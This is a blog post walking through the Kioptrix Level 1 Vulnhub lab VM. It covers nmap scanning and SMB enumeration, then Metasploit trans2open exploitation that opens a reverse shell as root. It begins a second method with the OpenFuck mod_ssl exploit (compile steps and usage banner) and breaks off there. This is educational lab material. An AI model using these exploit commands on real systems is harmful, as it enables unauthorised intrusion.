<!DOCTYPE html><html lang="en" mode="dark" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="theme" content="Chirpy v2.7.2"><meta name="generator" content="Jekyll v4.2.0" /><meta property="og:title" content="Kioptrix: Level 1 (#1)" /><meta name="author" content="Hummus_Ful" /><meta property="og:locale" content="en_US" /><meta name="description" content="Kioptrix: Level 1, a vulnerable-by-design virtual machine from Vulnhub, rated as Easy/Beginner level machine. We’ll try to get root shell and obtain flag." /><meta property="og:description" content="Kioptrix: Level 1, a vulnerable-by-design virtual machine from Vulnhub, rated as Easy/Beginner level machine. We’ll try to get root shell and obtain flag." /><link rel="canonical" href="https://hummus-ful.github.io/vulnhub/2021/01/17/Kioptrix_1.html" /><meta property="og:url" content="https://hummus-ful.github.io/vulnhub/2021/01/17/Kioptrix_1.html" /><meta property="og:site_name" content="Hacking Walkthroughs, Writeups and Guides" /><meta property="og:image" content="https://hummus-ful.github.io/assets/img/posts/Kioptrix_level_1/Kioptrix_level_1.webp" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2021-01-17T00:00:00+02:00" /><meta name="twitter:card" content="summary_large_image" /><meta property="twitter:image" content="https://hummus-ful.github.io/assets/img/posts/Kioptrix_level_1/Kioptrix_level_1.webp" /><meta property="twitter:title" content="Kioptrix: Level 1 (#1)" /><meta name="twitter:site" content="@Hummus_Ful" /><meta name="twitter:creator" content="@Hummus_Ful" /><meta name="google-site-verification" content="P3Rh-XrKLkBVXTQO6pVa9j7IMMHzGZ_n_ohonooVTc8" /> <script type="application/ld+json"> {"author":{"@type":"Person","name":"Hummus_Ful"},"description":"Kioptrix: Level 1, a vulnerable-by-design virtual machine from Vulnhub, rated as Easy/Beginner level machine. We’ll try to get root shell and obtain flag.","url":"https://hummus-ful.github.io/vulnhub/2021/01/17/Kioptrix_1.html","image":"https://hummus-ful.github.io/assets/img/posts/Kioptrix_level_1/Kioptrix_level_1.webp","@type":"BlogPosting","headline":"Kioptrix: Level 1 (#1)","dateModified":"2021-02-06T01:05:47+02:00","datePublished":"2021-01-17T00:00:00+02:00","mainEntityOfPage":{"@type":"WebPage","@id":"https://hummus-ful.github.io/vulnhub/2021/01/17/Kioptrix_1.html"},"@context":"https://schema.org"}</script><title>Kioptrix: Level 1 (#1) | Hacking Walkthroughs, Writeups and Guides</title><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png"><link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png"><link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png"><link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png"><link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png"><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png"><link rel="icon" type="image/png" sizes="192x192" href="/assets/img/favicons/android-icon-192x192.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/manifest.json"><meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="cdn.jsdelivr.net"><link rel="dns-prefetch" href="cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"><link rel="preload" href="/assets/css/post.css" as="style"><link rel="stylesheet" href="/assets/css/post.css"><link rel="preload" as="style" href="/assets/css/lib/bootstrap-toc.min.css"><link rel="stylesheet" href="/assets/css/lib/bootstrap-toc.min.css" /> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script> <script defer src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.15.0,npm/bootstrap@4/dist/js/bootstrap.min.js"></script> <script async src="/assets/js/post.min.js"></script> <script defer src="/app.js"></script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column align-items-end"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" alt="avatar" class="mx-auto"> <img src="/assets/img/avatar/hf.webp" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">Hacking Walkthroughs, Writeups and Guides</a></div><div class="site-subtitle font-italic">Learn Something New Every Day</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/tabs/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/tabs/tags/" class="nav-link"> <i class="fa-fw fas fa-tags ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/tabs/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/tabs/about/" class="nav-link"> <i class="fa-fw fas fa-info ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center"> <a href="https://github.com/Hummus-Ful" aria-label="github" target="_blank" rel="noopener"> <i class="fab fa-github-alt"></i> </a> <a href="https://twitter.com/Hummus_Ful" aria-label="twitter" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a> <a href=" javascript:location.href = 'mailto:' + ['example','doamin.com'].join('@')" aria-label="email" > <i class="fas fa-envelope"></i> </a> <a href="https://www.buymeacoffee.com/Hummus.Ful" aria-label="bmc" > <i class="fas fa-hand-holding-heart"></i> </a></div></div><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Posts </a> </span> <span>Kioptrix: Level 1 (#1)</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>Kioptrix: Level 1 (#1)</h1><div class="post-meta text-muted d-flex flex-column"><div> <span class="timeago " data-toggle="tooltip" data-placement="bottom" title="Sun, Jan 17, 2021, 12:00 AM +0200" > Jan 17 <i class="unloaded">2021-01-17T00:00:00+02:00</i> </span> by <span class="author"> Hummus_Ful </span></div><div> <span> Updated <span class="timeago lastmod" data-toggle="tooltip" data-placement="bottom" title="Sat, Feb 6, 2021, 1:05 AM +0200" > Feb 6 <i class="unloaded">2021-02-06T01:05:47+02:00</i> </span> </span> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="2615 words">13 min</span></div></div><div class="post-content"> <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/Kioptrix_level_1/Kioptrix_level_1.webp" class="preview-img"><p>Kioptrix: Level 1, a vulnerable-by-design virtual machine from Vulnhub, rated as Easy/Beginner level machine. We’ll try to get root shell and obtain flag.<br /></p><h1 id="introduction">Introduction</h1><p>This Kioptrix: Level 1 VM Image is rated as <strong>Easy/Beginner</strong> level challenge. The objective of the game is to acquire root access via any means possible. The purpose of the game is to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.<br /> It was created by <a href="https://www.vulnhub.com/author/kioptrix,8/">Kioptrix</a><br /> Other machines in the series can be found in the <a href="https://www.vulnhub.com/series/kioptrix,8/">Kioptrix</a> series page on Vulnhub.</p><h1 id="prerequisites">Prerequisites</h1><h2 id="kali-linux--parrot-security-os">Kali Linux / Parrot Security OS</h2><p>The virtual machine we’ll use to source the attack vectors against the Kioptrix level 1 virtual machine. These Linux distribution has all required tools pre-installed. Choose one of them.</p><ul><li>Kali Linux VM (based on Debian distribution) can be downloaded for both VMware and VirtualBox from <a href="https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-image-download/">Offensive-Security</a><li>Parrot Security VM (based on Arch distribution with different desktop flavors) can be downloaded from <a href="https://www.parrotsec.org/download/">Parrot Security</a></ul><h2 id="kioptrix-level-1-vulnerable-machine">Kioptrix: Level 1 Vulnerable Machine</h2><p>Download the virtual machine from <a href="https://www.vulnhub.com/entry/kioptrix-level-1-1,22/">Vulnhub</a>, start it and give it a couple of minutes to boot.</p><h2 id="dedicated-directory">Dedicated Directory</h2><p>We need to create a dedicated directory in our home directory <code class="language-console highlighter-rouge"><span class="go">~</span></code> for our findings. We’ll use <code class="language-console highlighter-rouge"><span class="go">mkdir</span></code> to create the directory and <code class="language-console highlighter-rouge"><span class="go">cd</span></code> to change into it:</p><div class="language-console highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre><span class="gp">$</span><span class="w"> </span><span class="nb">mkdir</span> ~/vulnhub/kioptrix_1
<span class="gp">$</span><span class="w"> </span><span class="nb">cd</span> ~/vulnhub/kioptrix_1/
</pre></table></code></div></div><h2 id="verify-our-ip-address">Verify our IP address</h2><p>We need to verify our IP address. We’ll use the <code class="language-console highlighter-rouge"><span class="go">ip addr</span></code> command to list all interfaces on our machine:</p><div class="language-console highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre><td class="rouge-code"><pre><span class="gp">$</span><span class="w"> </span>ip addr 
<span class="gp">1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt;</span><span class="w"> </span>mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
<span class="go">    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
</span><span class="gp">2: eth0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt;</span><span class="w"> </span>mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
<span class="go">    link/ether 08:00:27:ab:08:1c brd ff:ff:ff:ff:ff:ff
    inet 10.0.0.12/24 brd 10.0.0.255 scope global dynamic noprefixroute eth0
       valid_lft 446sec preferred_lft 446sec
    inet6 fe80::a00:27ff:feab:81c/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever
</span></pre></table></code></div></div><p>In this example, our IP is <strong>10.0.0.12</strong> - as can be seen under <code class="language-console highlighter-rouge"><span class="go">eth0</span></code> section, which is the relevant network interface. Your IP might be different and the network interface might be called <code class="language-console highlighter-rouge"><span class="go">wlan0</span></code> for example.</p><h1 id="scanning">Scanning</h1><h2 id="nmap">nmap</h2><p>We first need to discover the target IP. We’ll use a scan called <strong>Ping Sweep</strong> which will use ICMP ECHO packet to discover online hosts, without conducting further port scanning on each of the discovered host. <a href="https://nmap.org/">nmap</a> flag for such command is <code class="language-console highlighter-rouge"><span class="go">-sn</span></code>. The complete command is: <code class="language-console highlighter-rouge"><span class="go">sudo nmap -sn 10.0.0.0/24</span></code> where we scan the whole 254 usable IPs in the 10.0.0.0 network:</p><div class="language-console highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre><td class="rouge-code"><pre><span class="gp">$</span><span class="w"> </span><span class="nb">sudo </span>nmap <span class="nt">-sn</span> 10.0.0.0/24                      
<span class="go">[sudo] password for kali: 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-15 13:07 EST
</span><span class="c">...
</span><span class="go">MAC Address: 08:00:27:D4:3E:4B (Oracle VirtualBox virtual NIC)
Nmap scan report for 10.0.0.5
Host is up (0.00046s latency).
MAC Address: 08:00:27:BC:2C:4E (Oracle VirtualBox virtual NIC)
Nmap scan report for 10.0.0.12
Host is up.
</span><span class="c">...
</span></pre></table></code></div></div><p>According to the above results, our target’s IP is <strong>10.0.0.5</strong>.</p><h2 id="add-ip-to-hosts-file-optional">Add IP to hosts file [OPTIONAL]</h2><p>For better readability we’ll add the target IP to our local <code class="language-console highlighter-rouge"><span class="go">/etc/hosts</span></code> file.<br /> Please note this command requires sudo privileges.</p><div class="language-console highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre><span class="gp">$</span><span class="w"> </span><span class="nb">sudo </span>nano /etc/hosts
<span class="go">
127.0.0.1       localhost
127.0.1.1       kali
10.0.0.5        kioptrix
</span><span class="c">...
</span></pre></table></code></div></div><p>Now we can use the ‘<strong>kioptrix</strong>’ hostname instead of the IP in all the commands.</p><h2 id="back-to-nmap">Back to nmap</h2><p>Time to run a full TCP-SYN scan to scan for open TCP ports on the target:<br /> <code class="language-console highlighter-rouge"><span class="go">sudo nmap kioptrix -sV -p- -O -T4 -oN nmap</span></code></p><ul><li><code class="language-console highlighter-rouge"><span class="go">-sV</span></code> determine service/version info<li><code class="language-console highlighter-rouge"><span class="go">-T4</span></code> for faster execution<li><code class="language-console highlighter-rouge"><span class="go">-p-</span></code> scan all ports<li><code class="language-console highlighter-rouge"><span class="go">-O</span></code> identify Operating System<li><code class="language-console highlighter-rouge"><span class="go">-oN</span></code> output to file, in our case it’s called nmap</ul><div class="language-console highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
</pre><td class="rouge-code"><pre><span class="gp">$</span><span class="w"> </span><span class="nb">sudo </span>nmap <span class="nt">-sV</span> <span class="nt">-T4</span> <span class="nt">-p-</span> <span class="nt">-O</span> <span class="nt">-oN</span> nmap kioptrix     
<span class="go">Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-15 13:08 EST
Nmap scan report for 10.0.0.5
Host is up (0.00068s latency).
Not shown: 65529 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp    open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
</span><span class="gp">111/tcp   open  rpcbind     2 (RPC #</span>100000<span class="o">)</span>
<span class="go">139/tcp   open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp   open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
</span><span class="gp">32768/tcp open  status      1 (RPC #</span>100024<span class="o">)</span>
<span class="go">MAC Address: 08:00:27:BC:2C:4E (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.86 seconds
</span></pre></table></code></div></div><p>nmap wasn’t able to identify the SMB version. Let’s do it on our own. We can use three tools:</p><ol><li>Using <a href="https://tools.kali.org/information-gathering/enum4linux">enum4linux</a> (I’ll provide only the command)<li>Using <a href="https://tldp.org/HOWTO/SMB-HOWTO-8.html">smbclient</a> (I’ll provide only the command)<li>Using <a href="https://www.metasploit.com/">metasploit</a></ol><h2 id="enum4linux">enum4linux</h2><p><code class="language-console highlighter-rouge"><span class="go">enum4linux kioptrix</span></code></p><h2 id="smbclient">smbclient</h2><p><code class="language-console highlighter-rouge"><span class="go">smbclient -L kioptrix</span></code></p><h2 id="metasploit">metasploit</h2><dl><dt>Note:<dd>Before using metasploit, you might need to update it using <code class="language-console highlighter-rouge"><span class="gp">apt update;</span><span class="w"> </span>apt <span class="nb">install </span>metasploit-framework</code> command.</dl><p>Metasploit <code class="language-console highlighter-rouge"><span class="go">smb_version</span></code> module was designed to identify the Samba version:</p><div class="language-console highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
</pre><td class="rouge-code"><pre><span class="gp">msf6 &gt;</span><span class="w"> </span>use auxiliary/scanner/smb/smb_version 
<span class="gp">msf6 auxiliary(scanner/smb/smb_version) &gt;</span><span class="w"> </span>options 
<span class="go">
Module options (auxiliary/scanner/smb/smb_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
</span><span class="gp">   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:&lt;path&gt;</span><span class="s1">'
</span><span class="go">   THREADS  1                yes       The number of concurrent threads (max one per host)

</span><span class="gp">msf6 auxiliary(scanner/smb/smb_version) &gt;</span><span class="w"> </span><span class="nb">set </span>rhosts kioptrix
<span class="gp">rhosts =&gt;</span><span class="w"> </span>kioptrix
<span class="gp">msf6 auxiliary(scanner/smb/smb_version) &gt;</span><span class="w"> </span>run
<span class="go">
[*] kioptrix:139          - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] kioptrix:139          -   Host could not be identified: Unix (Samba 2.2.1a)
[*] kioptrix:             - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
</span></pre></table></code></div></div><p>Now we have the SMB version - <strong>Samba 2.2.1a</strong></p><h1 id="gaining-access">Gaining Access</h1><h2 id="method-1-trans2open-smb-vulnerability">Method 1: trans2open SMB vulnerability</h2><p>Now that we have the SMB version, we can use Google to look for known vulnerabilities.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/Kioptrix_level_1/Kioptrix-level-1_cve-2003-201.webp" alt="kioptrix Level 1 Samba SMB CVE" /> <em>Samba CVE-2003-201 trans2open</em></p><p>Still on metasploit, search for <strong>trans2open</strong>:</p><div class="language-console highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre><td class="rouge-code"><pre><span class="gp">msf6 &gt;</span><span class="w"> </span>search trans2open
<span class="go">
Matching Modules
================

</span><span class="gp">   #</span><span class="w">  </span>Name                              Disclosure Date  Rank   Check  Description
<span class="go">   -  ----                              ---------------  ----   -----  -----------
   0  exploit/freebsd/samba/trans2open  2003-04-07       great  No     Samba trans2open Overflow (*BSD x86)
   1  exploit/linux/samba/trans2open    2003-04-07       great  No     Samba trans2open Overflow (Linux x86)
   2  exploit/osx/samba/trans2open      2003-04-07       great  No     Samba trans2open Overflow (Mac OS X PPC)
   3  exploit/solaris/samba/trans2open  2003-04-07       great  No     Samba trans2open Overflow (Solaris SPARC)

Interact with a module by name or index. For example info 3, use 3 or use exploit/solaris/samba/trans2open
</span></pre></table></code></div></div><p>Choose option number 1 using the <code class="language-console highlighter-rouge"><span class="go">use 1</span></code> command.<br /> We need to choose the payload to use once we’re able to exploit. Let’s use a <strong>reverse shell payload</strong> in order to have remote shell connection, which is the <code class="language-console highlighter-rouge"><span class="go">set payload linux/x86/shell_reverse_tcp</span></code> command.<br /> Using <code class="language-console highlighter-rouge"><span class="go">options</span></code> command we can see what additional information we must provide before we can use the exploit (under the Required column). lastly we’ll execute the exploit using <code class="language-console highlighter-rouge"><span class="go">exploit</span></code> command.</p><div class="language-console highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
</pre><td class="rouge-code"><pre><span class="gp">msf6 &gt;</span><span class="w"> </span>use 1
<span class="go">[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
</span><span class="gp">msf6 exploit(linux/samba/trans2open) &gt;</span><span class="w"> </span>options 
<span class="go">
Module options (exploit/linux/samba/trans2open):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
</span><span class="gp">   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:&lt;path&gt;</span><span class="s1">'
</span><span class="go">   RPORT   139              yes       The target port (TCP)


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.0.12        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Samba 2.2.x - Bruteforce


</span><span class="gp">msf6 exploit(linux/samba/trans2open) &gt;</span><span class="w"> </span><span class="nb">set </span>RHOSTS kioptrix
<span class="gp">RHOSTS =&gt;</span><span class="w"> </span>kioptrix
<span class="gp">msf6 exploit(linux/samba/trans2open) &gt;</span><span class="w"> </span><span class="nb">set </span>payload linux/x86/shell/reverse_tcp
<span class="gp">payload =&gt;</span><span class="w"> </span>linux/x86/shell/reverse_tcp
<span class="gp">msf6 exploit(linux/samba/trans2open) &gt;</span><span class="w"> </span>exploit 
<span class="go">
[*] Started reverse TCP handler on 10.0.0.12:4444 
[*] 10.0.0.5:139 - Trying return address 0xbffffdfc...
[*] 10.0.0.5:139 - Trying return address 0xbffffcfc...
[*] 10.0.0.5:139 - Trying return address 0xbffffbfc...
[*] 10.0.0.5:139 - Trying return address 0xbffffafc...
[*] Sending stage (36 bytes) to 10.0.0.5
</span><span class="gp">[*] Command shell session 9 opened (10.0.0.12:4444 -&gt;</span><span class="w"> </span>10.0.0.5:32777<span class="o">)</span> at 2021-01-15 13:40:46 <span class="nt">-0500</span>
</pre></table></code></div></div><p>Great, now we can spawn an interactive shell and use <code class="language-console highlighter-rouge"><span class="go">whoami</span></code> command to check the user we where able to exploit:</p><div class="language-console highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre><td class="rouge-code"><pre><span class="go">shell
[*] Trying to find binary(python) on target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary(bash) on target machine
[*] Found bash at /bin/bash
ls
whoami
root
</span></pre></table></code></div></div><ul class="task-list"><li class="task-list-item" hide-bullet><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" />Gain root access to the machine</ul><h2 id="method-2-openfuck-mod_ssl-vulnerability">Method 2: OpenFuck mod_ssl vulnerability</h2><p>nmap revealed <strong>mod_ssl/2.8.4</strong> is enabled on port 443. Using Google we found the specific mod_ssl is vulnerable to <a href="https://www.cvedetails.com/vulnerability-list/vendor_id-1046/product_id-1817/version_id-6036/Mod-Ssl-Mod-Ssl-2.8.4.html">OpenFuck</a></p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/Kioptrix_level_1/Kioptrix-level-1_openfuck.webp" alt="kioptrix Level 1 mod_ssl OpenFuck" /> <em>Samba OpenFuck vulnerability</em></p><p>We can download it from <a href="https://www.exploit-db.com/">exploit-db</a> or use <strong>searchsploit</strong> and copy it to our path</p><div class="language-console highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre><td class="rouge-code"><pre><span class="gp">$</span><span class="w"> </span>searchsploit mod_ssl      
<span class="go">------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                          |  Path
------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Apache mod_ssl 2.0.x - Remote Denial of Service                                                                         | linux/dos/24590.txt
Apache mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow                                                              | multiple/dos/21575.txt
Apache mod_ssl &lt; 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow                                                    | unix/remote/21671.c
Apache mod_ssl &lt; 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1)                                              | unix/remote/764.c
Apache mod_ssl &lt; 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)                                              | unix/remote/47080.c
Apache mod_ssl OpenSSL &lt; 0.9.6d / &lt; 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow                            | unix/remote/40347.txt
------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
</span></pre></table></code></div></div><p>Now that we have the exploit number we can use <code class="language-console highlighter-rouge"><span class="go">-p</span></code> flag to find the full path of the exploit:</p><div class="language-console highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre><span class="gp">$</span><span class="w"> </span>searchsploit <span class="nt">-p</span> 47080
<span class="go">  Exploit: Apache mod_ssl &lt; 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)
      URL: https://www.exploit-db.com/exploits/47080
     Path: /usr/share/exploitdb/exploits/unix/remote/47080.c
File Type: C source, ASCII text, with CRLF line terminators
</span></pre></table></code></div></div><p>copy the exploit to our local directory<br /> <code class="language-console highlighter-rouge"><span class="go">cp /usr/share/exploitdb/exploits/unix/remote/47080.c .</span></code></p><p>Use <code class="language-console highlighter-rouge"><span class="go">cat</span></code>, <code class="language-console highlighter-rouge"><span class="go">head</span></code> or <code class="language-console highlighter-rouge"><span class="go">nano</span></code> to read the C file content and understand how we should compile and use it:</p><div class="language-console highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre><td class="rouge-code"><pre><span class="go">/*
 * OF version r00t VERY PRIV8 spabam
 * Version: v3.0.4 
 * Requirements: libssl-dev    ( apt-get install libssl-dev )
 * Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
 * objdump -R /usr/sbin/httpd|grep free to get more targets
</span><span class="gp"> * #</span>hackarena irc.brasnet.org
<span class="go"> * Note: if required, host ptrace and replace wget target
 */
</span></pre></table></code></div></div><p>According to the file head we need to:</p><ul><li>Install libssl-dv using the command <code class="language-console highlighter-rouge"><span class="go">sudo apt install libssl-dev</span></code><li>Compile the file (remember to change the name of the .c file) <code class="language-console highlighter-rouge"><span class="go">gcc -o OpenFuck OpenFuck.c -lcrypto</span></code><li>Change the file permissions in order to execute it <code class="language-console highlighter-rouge"><span class="go">sudo chmod 777 OpenFuck</span></code> (744 is also OK)</ul><p>Now we can execute the binary file using <code class="language-console highlighter-rouge"><span class="go">./OpenFuck</span></code>. The output is:</p><div class="language-console highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
</pre><td class="rouge-code"><pre><span class="gp">$</span><span class="w"> </span>./OpenFuck   
<span class="go">
*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
</span><span class="gp">* #</span>hackarena  irc.brasnet.org                                     <span class="k">*</span>
<span class="gp">* TNX Xanthic USG #</span>SilverLords <span class="c">#BloodBR #isotk #highsecure #uname *</span>
<span class="gp">* #</span>ION <span class="c">#delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *</span>
<span class="gp">* #</span>pinchadoresweb HiTechHate DigitalWrapperz P<span class="o">()</span>W GAT ButtP!rateZ <span class="k">*</span>
<span class="go">*******************************************************************

: Usage: ./OpenFuck target box [port] [-c N]

